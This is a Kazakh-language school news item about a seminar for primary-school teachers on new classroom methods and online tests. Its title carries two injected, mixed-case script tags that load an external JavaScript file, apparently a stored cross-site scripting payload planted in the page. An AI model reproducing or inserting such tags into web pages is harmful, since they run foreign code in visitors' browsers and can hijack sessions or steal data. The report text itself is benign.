Бастауыш сыныптарда жаңа әдіс-тәсілдерді тиімді қолдану жолдары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.04.2022

        «Ақмола облысы, Жақсы ауданы Ғ.Әбдірахманов атындағы жалпы орта білім беретін мектебі» КММ-де бастауыш сыныптар әдістемелік бірлестігінің апталығы аясында семинар-коучинг ұйымдастырылып өткізілді. Тақырыбы: «Бастауыш сыныптарда жаңа әдіс-тәсілдерді тиімді қолдану жолдары». Мақсаты: бастауыш сыныптарда сабақтарда қолданып жүрген жаңа әдіс-тәсілдердің тиімділігін ұстаздарға баяндау, іс жүзінде көрсету, тәжірибе алмасу.

         Бастауыш сыныптар әдістемелік бірлестігінің жетекшісі Жуманова Сауле Есеновна сабақтарда қолданып жүрген  «Суреттер бойынша амандасу» , «Саусақ моторикасын жетілдіру, дамыту» жаттығуларының түрлері ,«Wortwall» интерактивті  тапсырма құру әдісі, «Микс» жаттығулары, «Бэкроним», «Шеринг», «Бір минуттық әңгіме» , «Сұрақ ілмегі» тәсілдері мен «Шыбындарды жою» ойыны туралы баяндап, шәкірттердің ой-өрісінің кеңеюі мен көзқарасының қалыптасуына, білімнің нәтижелі болуына жаңа әдіс-тәсілдерің  маңызы зор екенін айтты .

         Практикалық бөлімде «Гугл тест арқылы онлайн тест жасау» әдісі мен жаңа тәсілдерге, жаттығуларларға ұстаздар қауымы белсене қатысты. Өткізілген семинар әрбір ұстазды ойландыратыны, жаңаша жұмыс істеуге, жаңа ізденістерге жетелейтіні сөзсіз.

Просмотров: 792


Пікір қосу



Деректерді қолтаңбаға қосу